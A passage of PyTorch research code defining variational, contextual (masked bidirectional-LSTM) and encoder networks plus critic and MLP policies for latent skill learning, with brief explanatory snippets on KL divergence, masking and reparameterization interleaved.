sampled_z_index = sampled_z_index.squeeze(1)
##################################################
# Modify z's based on whether b was 1 or 0.
##################################################
if new_z_selection:
if not(self.translation_network):
# Set initial b to 1.
sampled_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
sampled_z_index[t, torch.where(sampled_b[t]==0)[0]] = sampled_z_index[t-1, torch.where(sampled_b[t]==0)[0]]
# How to vectorize this op?
# In general, need to spend some time rewriting this entire function.
##################################################
# Get z probabilities, KL and prior values.
##################################################
# Also compute logprobabilities of the latent_z's sampled from this net.
if self.args.batch_size>1:
variational_z_logprobabilities = self.dists.log_prob(sampled_z_index)
else:
variational_z_logprobabilities = self.dists.log_prob(sampled_z_index.unsqueeze(1))
variational_z_probabilities = None
# Set standard distribution for KL.
self.standard_distribution = torch.distributions.MultivariateNormal(torch.zeros((self.output_size)).to(device),torch.eye((self.output_size)).to(device))
# Compute KL.
kl_divergence = torch.distributions.kl_divergence(self.dists, self.standard_distribution)
# Prior loglikelihood
prior_loglikelihood = self.standard_distribution.log_prob(sampled_z_index)
if self.args.debug:
print("#################################")
print("Embedding in Variational Network.")
embed()
if self.translation_network:
if evaluate_z_probability is None:
return sampled_z_index
else:
return self.dists.log_prob(evaluate_z_probability)
else:
return sampled_z_index, sampled_b, variational_b_logprobabilities.squeeze(1), \
variational_z_logprobabilities, variational_b_probabilities.squeeze(1), variational_z_probabilities, kl_divergence, prior_loglikelihood
def get_probabilities(self, input, epsilon, precomputed_b=None, evaluate_value=None):
return self.forward(input, epsilon, precomputed_b=precomputed_b, evaluate_z_probability=evaluate_value)
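# The KL term above is computed between the diagonal-covariance Gaussians
# predicted by the network and a standard normal prior N(0, I). A minimal
# sketch with a hypothetical 2-D latent, checked against the closed form
# 0.5 * sum(var + mu^2 - 1 - log var):

```python
import torch

mu = torch.tensor([0.5, -0.5])
var = torch.tensor([0.25, 1.0])
q = torch.distributions.MultivariateNormal(mu, torch.diag_embed(var))   # posterior stand-in
p = torch.distributions.MultivariateNormal(torch.zeros(2), torch.eye(2))  # standard normal prior
kl = torch.distributions.kl_divergence(q, p)
closed_form = 0.5 * (var + mu**2 - 1.0 - torch.log(var)).sum()
```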
class ContinuousContextualVariationalPolicyNetwork(ContinuousVariationalPolicyNetwork_Batch):
def __init__(self, input_size, hidden_size, z_dimensions, args, number_layers=4):
super(ContinuousContextualVariationalPolicyNetwork, self).__init__(input_size, hidden_size, z_dimensions, args, number_layers)
# Define a bidirectional LSTM now.
self.z_dimensions = self.args.z_dimensions
self.contextual_lstm = torch.nn.LSTM(input_size=self.args.z_dimensions,hidden_size=self.hidden_size,num_layers=self.num_layers, bidirectional=True, dropout=self.args.dropout)
# self.z_output_layer = torch.nn.Linear(2*self.hidden_size, self.z_dimensions)
self.contextual_mean_output_layer = torch.nn.Linear(2*self.hidden_size,self.output_size)
self.contextual_variances_output_layer = torch.nn.Linear(2*self.hidden_size, self.output_size)
def forward(self, input, epsilon, new_z_selection=True, batch_size=None, batch_trajectory_lengths=None):
# First run the forward function of the original variational network.
# This runs the initial LSTM and predicts the original embedding of skills.
sampled_z_index, sampled_b, variational_b_logprobabilities, \
variational_z_logprobabilities, variational_b_probabilities, \
variational_z_probabilities, kl_divergence, prior_loglikelihood = \
super().forward(input, epsilon, new_z_selection=new_z_selection, batch_size=batch_size, batch_trajectory_lengths=batch_trajectory_lengths)
# Now parse the sequence of per timestep z's to sequence of z's of length = the number of skills in the trajectory.
# The latent_b vector has this information, specified in terms of when b=1.
distinct_indices_collection = []
z_sequence_collection = []
# Also collect indices to mask, at specified mask fraction
mask_indices_collection = []
max_distinct_zs = 0
for j in range(self.args.batch_size):
# Mask z's that extend past the trajectory length.
sampled_b[batch_trajectory_lengths[j]:,j] = 0
sampled_z_index[batch_trajectory_lengths[j]:,j] = 0.
# Get times at which we actually observe distinct z's.
distinct_z_indices = torch.where(sampled_b[:,j])[0].clone().detach().cpu().numpy()
# Keep track of max, so that we can create a tensor of that size.
if len(distinct_z_indices)>max_distinct_zs:
max_distinct_zs = len(distinct_z_indices)
# mask_indices.append(np.random.choice(distinct_z_indices, size=int(len(distinct_z_indices)*self.args.mask_fraction), replace=False))
# These mask indices index into the distinct_indices list, so the values in mask indices are positions in the list to be masked.
# Masking strategy - uniformly randomly sample mask_fraction arbitrarily.
number_mask_elements = np.ceil(len(distinct_z_indices)*self.args.mask_fraction).astype(int)
if number_mask_elements==1 and len(distinct_z_indices)==1:
number_mask_elements = 0
mask_indices = np.random.choice(range(len(distinct_z_indices)), size=number_mask_elements, replace=False)
mask_indices_collection.append(copy.deepcopy(mask_indices))
# Now copy over the masked indices into a single list.
distinct_indices_collection.append(copy.deepcopy(distinct_z_indices))
# Now actually mask the chosen mask indices.
masked_z = sampled_z_index[distinct_z_indices,j]
masked_z[mask_indices] = 0.
# Now copy over the masked indices into a single list.
z_sequence_collection.append(masked_z)
# Now that we've gotten the distinct z sequence, make padded tensor version of this.
self.initial_skill_embedding = torch.zeros((max_distinct_zs, self.args.batch_size, self.args.z_dimensions)).to(device).float()
# Having created a tensor for this, copy into the tensor.
for j in range(self.args.batch_size):
self.initial_skill_embedding[:len(z_sequence_collection[j]),j] = z_sequence_collection[j]
# Now that we've gotten the initial skill embeddings (from the distinct z sequence),
# feed them into the contextual LSTM and predict new contextual embeddings.
contextual_outputs, contextual_hidden = self.contextual_lstm(self.initial_skill_embedding)
# self.contextual_skill_embedding = self.z_output_layer(contextual_outputs)
# Now recreate distributions, so we can evaluate new KL.
self.contextual_mean = self.contextual_mean_output_layer(contextual_outputs)
var_epsilon = 0.001
self.contextual_variance = self.variance_factor*(self.variance_activation_layer(self.contextual_variances_output_layer(contextual_outputs))+self.variance_activation_bias) + var_epsilon
self.contextual_dists = torch.distributions.MultivariateNormal(self.contextual_mean, torch.diag_embed(self.contextual_variance))
if self.args.train:
noise = torch.randn_like(self.contextual_variance)
# Instead of *sampling* the latent z from a distribution, construct using mu + sig * eps (random noise).
self.contextual_skill_embedding = (self.contextual_mean + self.contextual_variance*noise).squeeze(1)
# Ought to be able to pass gradients through this latent_z now.
# If evaluating, greedily get action.
else:
self.contextual_skill_embedding = self.contextual_mean.squeeze(1)
#########
# Now must reconstruct the z vector (sampled_z_indices). # Incidentally this removes need for masking of z's.
# Must use the original sampled_b to take care of this.
new_sampled_z_indices = torch.zeros_like(sampled_z_index).to(device)
for j in range(self.args.batch_size):
# Use distinct_z_indices, where we have already computed torch.where(sampled_b[:,j]).
# May need to manipulate this to negate the where.
for k in range(len(distinct_indices_collection[j])-1):
new_sampled_z_indices[distinct_indices_collection[j][k]:distinct_indices_collection[j][k+1],j] = self.contextual_skill_embedding[k,j]
# new_sampled_z_indices[distinct_indices_collection[j][-1]:batch_trajectory_lengths[j],j] = self.contextual_skill_embedding[k+1,j]
new_sampled_z_indices[distinct_indices_collection[j][-1]:batch_trajectory_lengths[j],j] = self.contextual_skill_embedding[len(distinct_indices_collection[j])-1,j]
# Now recompute prior_loglikelihood with the new zs.
prior_loglikelihood = self.standard_distribution.log_prob(new_sampled_z_indices)
# Also recompute the KL.
# kl_divergence = torch.distributions.kl_divergence(self.contextual_dists, self.standard_distribution).mean()
# Return same objects as original forward function.
return new_sampled_z_indices, sampled_b, variational_b_logprobabilities, \
variational_z_logprobabilities, variational_b_probabilities, \
variational_z_probabilities, kl_divergence, prior_loglikelihood
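# The contextual network above masks a fraction of the distinct z's
# (BERT-style), so the bidirectional LSTM must infer the masked skills from
# context. A minimal sketch of that masking, with hypothetical sizes and an
# assumed mask_fraction value:

```python
import numpy as np

rng = np.random.default_rng(0)
num_skills, z_dim, mask_fraction = 5, 3, 0.4
z_sequence = np.ones((num_skills, z_dim))                   # stand-in distinct-z sequence

# Uniformly sample ceil(mask_fraction * num_skills) positions, then zero them out.
num_masked = int(np.ceil(num_skills * mask_fraction))
mask_positions = rng.choice(num_skills, size=num_masked, replace=False)
z_sequence[mask_positions] = 0.
```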
class ContinuousNewContextualVariationalPolicyNetwork(ContinuousVariationalPolicyNetwork_Batch):
def __init__(self, input_size, hidden_size, z_dimensions, args, number_layers=4):
super(ContinuousNewContextualVariationalPolicyNetwork, self).__init__(input_size, hidden_size, z_dimensions, args, number_layers)
# Define a bidirectional LSTM now.
self.z_dimensions = self.args.z_dimensions
self.contextual_lstm = torch.nn.LSTM(input_size=self.args.z_dimensions,hidden_size=self.hidden_size,num_layers=self.num_layers, bidirectional=True, dropout=self.args.dropout)
# self.z_output_layer = torch.nn.Linear(2*self.hidden_size, self.z_dimensions)
self.contextual_mean_output_layer = torch.nn.Linear(2*self.hidden_size,self.output_size)
self.contextual_variances_output_layer = torch.nn.Linear(2*self.hidden_size, self.output_size)
def forward(self, input, epsilon, new_z_selection=True, batch_size=None, batch_trajectory_lengths=None):
#####################
# First run the forward function of the original variational network.
# This runs the initial LSTM and predicts the original embedding of skills.
#####################
sampled_z_index, sampled_b, variational_b_logprobabilities, \
variational_z_logprobabilities, variational_b_probabilities, \
variational_z_probabilities, kl_divergence, prior_loglikelihood = \
super().forward(input, epsilon, new_z_selection=new_z_selection, batch_size=batch_size, batch_trajectory_lengths=batch_trajectory_lengths)
#####################
# Now parse the sequence of per timestep z's to sequence of z's of length = the number of skills in the trajectory.
# The latent_b vector has this information, specified in terms of when b=1.
#####################
# Create separate masking object.
contextual_mask = torch.ones_like(sampled_z_index).to(device).float()
for j in range(self.args.batch_size):
#####################
# Mask z's that extend past the trajectory length.
#####################
sampled_b[batch_trajectory_lengths[j]:,j] = 0
sampled_z_index[batch_trajectory_lengths[j]:,j] = 0.
contextual_mask[batch_trajectory_lengths[j]:,j] = 0.
#####################
# Get times at which we actually observe distinct z's.
#####################
distinct_z_indices = torch.where(sampled_b[:,j])[0].clone().detach().cpu().numpy()
#####################
# These mask indices index into the distinct_indices list, so the values in mask indices are positions in the list to be masked.
# Masking strategy - uniformly randomly sample mask_fraction arbitrarily.
#####################
number_mask_elements = np.ceil(len(distinct_z_indices)*self.args.mask_fraction).astype(int)
if number_mask_elements==1 and len(distinct_z_indices)==1:
number_mask_elements = 0
mask_indices = np.random.choice(range(len(distinct_z_indices)), size=number_mask_elements, replace=False)
#####################
# Now actually mask the chosen mask indices.
#####################
for k in range(len(mask_indices)):
if mask_indices[k]+1 >= len(distinct_z_indices):
end_index = contextual_mask.shape[0]
else:
end_index = distinct_z_indices[mask_indices[k]+1]
contextual_mask[distinct_z_indices[mask_indices[k]]:end_index,j] = 0
#####################
# Now mask the sampled input to create the masked input.
#####################
self.initial_skill_embedding = contextual_mask*sampled_z_index
#####################
# Now that we've gotten the initial skill embeddings (from the distinct z sequence),
# feed them into the contextual LSTM and predict new contextual embeddings.
#####################
contextual_outputs, contextual_hidden = self.contextual_lstm(self.initial_skill_embedding)
#####################
# Now recreate distributions, so we can evaluate new KL.
#####################
self.contextual_mean = self.contextual_mean_output_layer(contextual_outputs)
var_epsilon = 0.001
self.contextual_variance = self.variance_factor*(self.variance_activation_layer(self.contextual_variances_output_layer(contextual_outputs))+self.variance_activation_bias) + var_epsilon
self.contextual_dists = torch.distributions.MultivariateNormal(self.contextual_mean, torch.diag_embed(self.contextual_variance))
if self.args.train:
noise = torch.randn_like(self.contextual_variance)
# Instead of *sampling* the latent z from a distribution, construct using mu + sig * eps (random noise).
self.contextual_skill_embedding = (self.contextual_mean + self.contextual_variance*noise).squeeze(1)
# Ought to be able to pass gradients through this latent_z now.
# If evaluating, greedily get action.
else:
self.contextual_skill_embedding = self.contextual_mean.squeeze(1)
#####################
# Since the contextual embeddings are just predicted by an LSTM, use the same "new z selection" technique
# as in the original variational network, which copies over the previous timestep's z if b at that timestep is 0 (i.e. continue).
#####################
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
# sampled_z_index[t, torch.where(sampled_b[t]==0)[0]] = sampled_z_index[t-1, torch.where(sampled_b[t]==0)[0]]
self.contextual_skill_embedding[t, torch.where(sampled_b[t]==0)[0]] = self.contextual_skill_embedding[t-1, torch.where(sampled_b[t]==0)[0]]
# Now recompute prior_loglikelihood with the new zs.
prior_loglikelihood = self.standard_distribution.log_prob(self.contextual_skill_embedding)
# Also recompute the KL.
kl_divergence = torch.distributions.kl_divergence(self.contextual_dists, self.standard_distribution)
#######
# Try ELMO embeddings.
if self.args.ELMO_embeddings:
self.elmo_contextual_skill_embedding = self.contextual_skill_embedding + sampled_z_index
else:
# If not using ELMO embedding, just use the newly predicted ones.
self.elmo_contextual_skill_embedding = self.contextual_skill_embedding
# Return same objects as original forward function.
return self.elmo_contextual_skill_embedding, sampled_b, variational_b_logprobabilities, \
variational_z_logprobabilities, variational_b_probabilities, \
variational_z_probabilities, kl_divergence, prior_loglikelihood
class EncoderNetwork(PolicyNetwork_BaseClass):
# Policy Network inherits from torch.nn.Module.
# Now we overwrite the init, forward functions. And define anything else that we need.
def __init__(self, input_size, hidden_size, output_size, number_subpolicies=4, batch_size=1, args=None):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(EncoderNetwork, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.number_subpolicies = number_subpolicies
self.args = args
self.batch_size = self.args.batch_size
self.num_layers = self.args.number_layers
# Define a bidirectional LSTM now.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers, bidirectional=True, dropout=self.args.dropout)
# Define output layers for the LSTM, and activations for this output layer.
# Because it's bidirectional, once we compute <outputs, hidden = self.lstm(input)>, we must concatenate:
# From reverse LSTM: <outputs[0,:,hidden_size:]> and from the forward LSTM: <outputs[-1,:,:hidden_size]>.
# (Refer - https://towardsdatascience.com/understanding-bidirectional-rnn-in-pytorch-5bd25a5dd66 )
# Because of this, the output layer must take in size 2*hidden.
self.hidden_layer = torch.nn.Linear(2*self.hidden_size, 2*self.hidden_size)
self.output_layer = torch.nn.Linear(2*self.hidden_size, self.output_size)
# Sigmoid and Softmax activation functions for Bernoulli termination probability and latent z selection.
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
def forward(self, input, epsilon=0.0001):
# Input format must be: Sequence_Length x 1 x Input_Size.
# Input is assumed to be a torch tensor (view() is called on it directly).
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
# Instead of iterating over time and passing each timestep's input to the LSTM, we can now just pass the entire input sequence.
outputs, hidden = self.lstm(format_input)
concatenated_outputs = torch.cat([outputs[0,:,self.hidden_size:],outputs[-1,:,:self.hidden_size]],dim=-1).view((1,self.batch_size,-1))
# Calculate preprobs.
preprobabilities = self.output_layer(self.hidden_layer(concatenated_outputs))
probabilities = self.batch_softmax_layer(preprobabilities)
logprobabilities = self.batch_logsoftmax_layer(preprobabilities)
latent_z = self.select_epsilon_greedy_action(probabilities, epsilon=epsilon)
        # Return the latent z encoding computed from the concatenated LSTM end states.
return latent_z, logprobabilities, None, None
def get_probabilities(self, input):
        # Input format must be: Sequence_Length x Batch_Size x Input_Size.
        # The input is expected to be a torch tensor (not a numpy array), since .view() is called on it.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
# Instead of iterating over time and passing each timestep's input to the LSTM, we can now just pass the entire input sequence.
outputs, hidden = self.lstm(format_input)
concatenated_outputs = torch.cat([outputs[0,:,self.hidden_size:],outputs[-1,:,:self.hidden_size]],dim=-1).view((1,self.batch_size,-1))
# Calculate preprobs.
preprobabilities = self.output_layer(self.hidden_layer(concatenated_outputs))
probabilities = self.batch_softmax_layer(preprobabilities)
logprobabilities = self.batch_logsoftmax_layer(preprobabilities)
        # Return the latent z encoding computed from the concatenated LSTM end states.
return logprobabilities, probabilities
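The slicing used in `forward` and `get_probabilities` above can be checked directly against the LSTM's returned hidden state. A minimal sketch with hypothetical sizes (single layer, so `h_n` stacks exactly `[forward_final, backward_final]`):

```python
import torch

# Verify the bidirectional-LSTM slicing described in the comments above:
# the forward direction's final state lives at outputs[-1, :, :hidden_size],
# the reverse direction's final state at outputs[0, :, hidden_size:].
torch.manual_seed(0)
seq_len, batch, input_size, hidden_size = 7, 3, 5, 4
lstm = torch.nn.LSTM(input_size=input_size, hidden_size=hidden_size, bidirectional=True)

x = torch.randn(seq_len, batch, input_size)
outputs, (h_n, c_n) = lstm(x)

# With a single layer, h_n stacks [forward_final, backward_final].
assert torch.allclose(outputs[-1, :, :hidden_size], h_n[0])
assert torch.allclose(outputs[0, :, hidden_size:], h_n[1])

# The encoder concatenates the two end states into one summary vector per batch element.
summary = torch.cat([outputs[0, :, hidden_size:], outputs[-1, :, :hidden_size]], dim=-1)
assert summary.shape == torch.Size([3, 8])
```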
class ContinuousEncoderNetwork(PolicyNetwork_BaseClass):
# Policy Network inherits from torch.nn.Module.
# Now we overwrite the init, forward functions. And define anything else that we need.
def __init__(self, input_size, hidden_size, output_size, args, batch_size=1):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(ContinuousEncoderNetwork, self).__init__()
self.args = args
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.num_layers = self.args.var_number_layers
self.batch_size = self.args.batch_size
# Define a bidirectional LSTM now.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers, bidirectional=True)
# Define output layers for the LSTM, and activations for this output layer.
        # # Because it's bidirectional, once we compute <outputs, hidden = self.lstm(input)>, we must concatenate:
# # From reverse LSTM: <outputs[0,:,hidden_size:]> and from the forward LSTM: <outputs[-1,:,:hidden_size]>.
# # (Refer - https://towardsdatascience.com/understanding-bidirectional-rnn-in-pytorch-5bd25a5dd66 )
# # Because of this, the output layer must take in size 2*hidden.
# self.hidden_layer = torch.nn.Linear(2*self.hidden_size, self.hidden_size)
# self.output_layer = torch.nn.Linear(2*self.hidden_size, self.output_size)
        # Softmax and LogSoftmax activations for selecting the discrete latent z.
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
# Define output layers for the LSTM, and activations for this output layer.
self.mean_output_layer = torch.nn.Linear(2*self.hidden_size,self.output_size)
self.variances_output_layer = torch.nn.Linear(2*self.hidden_size, self.output_size)
self.activation_layer = torch.nn.Tanh()
self.variance_activation_layer = torch.nn.Softplus()
self.variance_activation_bias = 0.
self.variance_factor = 0.01
def forward(self, input, epsilon=0.001, z_sample_to_evaluate=None):
# This epsilon passed as an argument is just so that the signature of this function is the same as what's provided to the discrete encoder network.
# Input format must be: Sequence_Length x Batch_Size x Input_Size.
        # The input is expected to be a torch tensor (not a numpy array), since .view() is called on it.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
# Instead of iterating over time and passing each timestep's input to the LSTM, we can now just pass the entire input sequence.
outputs, hidden = self.lstm(format_input)
concatenated_outputs = torch.cat([outputs[0,:,self.hidden_size:],outputs[-1,:,:self.hidden_size]],dim=-1).view((1,self.batch_size,-1))
# Predict Gaussian means and variances.
# if self.args.mean_nonlinearity:
# mean_outputs = self.activation_layer(self.mean_output_layer(concatenated_outputs))
# else:
mean_outputs = self.mean_output_layer(concatenated_outputs)
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(concatenated_outputs))+self.variance_activation_bias) + epsilon
dist = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
        # Whether to use the reparameterization trick to retrieve the latent z.
if self.args.reparam:
noise = torch.randn_like(variance_outputs)
            # Instead of *sampling* the latent z from the distribution, construct it as mu + scale * eps (random noise).
            # Note that the predicted variance is used directly as the scale here (rather than its square root).
            latent_z = mean_outputs + variance_outputs * noise
            # Gradients can now flow through latent_z.
else:
# Retrieve sample from the distribution as the value of the latent variable.
latent_z = dist.sample()
# calculate entropy for training.
entropy = dist.entropy()
# Also retrieve log probability of the same.
logprobability = dist.log_prob(latent_z)
# Set standard distribution for KL.
self.standard_distribution = torch.distributions.MultivariateNormal(torch.zeros((self.output_size)).to(device),torch.eye((self.output_size)).to(device))
# Compute KL.
kl_divergence = torch.distributions.kl_divergence(dist, self.standard_distribution)
if self.args.debug:
print("###############################")
print("Embedding in Encoder Network.")
embed()
if z_sample_to_evaluate is None:
return latent_z, logprobability, entropy, kl_divergence
else:
logprobability = dist.log_prob(z_sample_to_evaluate)
return logprobability
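The reparameterized branch above constructs the latent as the mean plus noise scaled by the (raw) variance output. The underlying trick — `z = mu + sigma * eps` with `eps ~ N(0, 1)` — can be sanity-checked numerically; a small numpy sketch (sizes and seed arbitrary):

```python
import numpy as np

# Numeric sketch of the reparameterization trick: z = mu + sigma * eps with
# eps ~ N(0, 1) yields samples distributed as N(mu, sigma^2), while mu and
# sigma remain differentiable parameters in the network above.
rng = np.random.default_rng(0)
mu, sigma = 1.5, 0.3
eps = rng.standard_normal(200_000)
z = mu + sigma * eps

# The empirical moments match the target distribution.
assert abs(z.mean() - mu) < 1e-2
assert abs(z.std() - sigma) < 1e-2
```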
class CriticNetwork(torch.nn.Module):
def __init__(self, input_size, hidden_size, output_size, args=None, number_layers=4):
super(CriticNetwork, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.number_layers = number_layers
self.batch_size = 1
# Create LSTM Network.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.number_layers)
self.output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
def forward(self, input):
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
lstm_outputs, hidden = self.lstm(format_input)
# Predict critic value for each timestep.
critic_value = self.output_layer(lstm_outputs)
return critic_value
class ContinuousMLP(torch.nn.Module):
def __init__(self, input_size, hidden_size, output_size, args=None, number_layers=4):
super(ContinuousMLP, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.args = args
self.input_layer = torch.nn.Linear(self.input_size, self.hidden_size)
self.hidden_layer1 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.hidden_layer2 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.hidden_layer3 = torch.nn.Linear(self.hidden_size, self.hidden_size)
if self.args.small_translation_model:
self.mean_output_layer = torch.nn.Linear(self.input_size,self.output_size)
self.variances_output_layer = torch.nn.Linear(self.input_size,self.output_size)
else:
self.mean_output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
self.variances_output_layer = torch.nn.Linear(self.hidden_size, self.output_size)
self.variance_factor = 0.01
self.variance_activation_bias = 0.
if self.args.leaky_relu:
self.relu_activation = torch.nn.LeakyReLU()
else:
self.relu_activation = torch.nn.ReLU()
self.variance_activation_layer = torch.nn.Softplus()
        # self.dropout_layer = torch.nn.Dropout(self.args.mlp_dropout)
        # Use the generic dropout rate rather than the MLP-specific one for now.
        self.dropout_layer = torch.nn.Dropout(self.args.dropout)
if self.args.batch_norm:
self.batch_norm_layer1 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer2 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer3 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer4 = torch.nn.BatchNorm1d(self.hidden_size)
def forward(self, input, greedy=False, action_epsilon=0.0001):
# Assumes input is Batch_Size x Input_Size.
if self.args.small_translation_model:
# final_layer = self.input_layer(input)
# Special input to output layer..
self.mean_outputs = self.mean_output_layer(input)
self.variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(input))+self.variance_activation_bias) + action_epsilon
else:
if self.args.batch_norm:
s1 = input.shape[0]
if len(input.shape)==3:
s2 = input.shape[1]
else:
s2 = 1
h1 = self.dropout_layer(self.relu_activation(self.batch_norm_layer1( self.input_layer(input).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h2 = self.dropout_layer(self.relu_activation(self.batch_norm_layer2( self.hidden_layer1(h1).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h3 = self.dropout_layer(self.relu_activation(self.batch_norm_layer3( self.hidden_layer2(h2).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h4 = self.dropout_layer(self.relu_activation(self.batch_norm_layer4( self.hidden_layer3(h3).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h4 = h4.squeeze(1)
else:
h1 = self.dropout_layer(self.relu_activation(self.input_layer(input)))
h2 = self.dropout_layer(self.relu_activation(self.hidden_layer1(h1)))
h3 = self.dropout_layer(self.relu_activation(self.hidden_layer2(h2)))
h4 = self.dropout_layer(self.relu_activation(self.hidden_layer3(h3)))
final_layer = h4
self.mean_outputs = self.mean_output_layer(final_layer)
self.variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(final_layer))+self.variance_activation_bias) + action_epsilon
        # NOTE: the predicted variance above is discarded and replaced with a fixed value.
        # self.variance_value = 1e-5
        self.variance_value = 0.05
        self.variance_outputs = self.variance_value*torch.ones_like(self.mean_outputs).to(device).float()
noise = torch.randn_like(self.variance_outputs)
if greedy:
action = self.mean_outputs
else:
            # Instead of *sampling* the action from a distribution, construct it as mu + scale * eps (random noise).
            action = self.mean_outputs + self.variance_outputs * noise
if self.args.residual_translation:
return action+input
else:
return action
def reparameterized_get_actions(self, input, greedy=False, action_epsilon=0.0001):
return self.forward(input, greedy, action_epsilon)
def get_probabilities(self, input, evaluate_value, action_epsilon):
# Run forward to set the variance and mean values.
_ = self.forward(input, action_epsilon=action_epsilon)
# Create distribution.
self.dists = torch.distributions.MultivariateNormal(self.mean_outputs, torch.diag_embed(self.variance_outputs))
# Evaluate logprobability.
return self.dists.log_prob(evaluate_value)
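`get_probabilities` above evaluates the log-density of a diagonal Gaussian (a `MultivariateNormal` with a `diag_embed` covariance). That density factorizes per dimension; a small pure-Python sketch of the same formula (example numbers arbitrary):

```python
import math

# Log-density of a diagonal Gaussian: log p(x) decomposes into a sum of
# per-dimension terms, which is what MultivariateNormal with a diagonal
# covariance computes internally.
def diag_gaussian_log_prob(x, mean, var):
    return sum(
        -0.5 * (math.log(2.0 * math.pi * v) + (xi - m) ** 2 / v)
        for xi, m, v in zip(x, mean, var)
    )

lp = diag_gaussian_log_prob([0.1, -0.2], [0.0, 0.0], [0.05, 0.05])
assert abs(lp - 0.6578552072) < 1e-9
```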
class CriticMLP(torch.nn.Module):
def __init__(self, input_size, hidden_size, output_size, args=None, number_layers=4):
super(CriticMLP, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.batch_size = 1
self.args = args
self.input_layer = torch.nn.Linear(self.input_size, self.hidden_size)
self.hidden_layer1 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.hidden_layer2 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.hidden_layer3 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.output_layer = torch.nn.Linear(self.hidden_size, self.output_size)
if self.args.leaky_relu:
self.relu_activation = torch.nn.LeakyReLU()
else:
self.relu_activation = torch.nn.ReLU()
self.dropout_layer = torch.nn.Dropout(self.args.mlp_dropout)
if self.args.batch_norm:
self.batch_norm_layer1 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer2 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer3 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer4 = torch.nn.BatchNorm1d(self.hidden_size)
def forward(self, input, greedy=False, action_epsilon=0.0001):
# Assumes input is Batch_Size x Input_Size.
if self.args.batch_norm:
s1 = input.shape[0]
if len(input.shape)==3:
s2 = input.shape[1]
else:
s2 = 1
h1 = self.dropout_layer(self.relu_activation(self.batch_norm_layer1( self.input_layer(input).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h2 = self.dropout_layer(self.relu_activation(self.batch_norm_layer2( self.hidden_layer1(h1).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h3 = self.dropout_layer(self.relu_activation(self.batch_norm_layer3( self.hidden_layer2(h2).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h4 = self.dropout_layer(self.relu_activation(self.batch_norm_layer4( self.hidden_layer3(h3).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h4 = h4.squeeze(1)
else:
h1 = self.dropout_layer(self.relu_activation(self.input_layer(input)))
h2 = self.dropout_layer(self.relu_activation(self.hidden_layer1(h1)))
h3 = self.dropout_layer(self.relu_activation(self.hidden_layer2(h2)))
h4 = self.dropout_layer(self.relu_activation(self.hidden_layer3(h3)))
# Predict critic value for each timestep.
critic_value = self.output_layer(h4)
return critic_value
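The batch-norm branch in `forward` above flattens `(S1, S2, H)` activations to `(S1*S2, H)` because `torch.nn.BatchNorm1d` normalizes over `(N, C)` (or `(N, C, L)`) inputs, then views the result back. A minimal sketch with hypothetical sizes:

```python
import torch

# BatchNorm1d treats dim 1 as channels, so a (S1, S2, H) activation must be
# flattened to (S1*S2, H) before normalization and reshaped afterwards --
# the same view(-1, hidden_size) / view(s1, s2, hidden_size) pattern as above.
torch.manual_seed(0)
s1, s2, hidden = 6, 2, 4
bn = torch.nn.BatchNorm1d(hidden)
x = torch.randn(s1, s2, hidden)

out = bn(x.view(-1, hidden)).view(s1, s2, hidden)
assert out.shape == (s1, s2, hidden)
```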
class DiscreteMLP(torch.nn.Module):
def __init__(self, input_size, hidden_size, output_size, args=None, number_layers=4):
super(DiscreteMLP, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.args = args
self.input_layer = torch.nn.Linear(self.input_size, self.hidden_size)
self.hidden_layer1 = torch.nn.Linear(self.hidden_size, self.hidden_size)
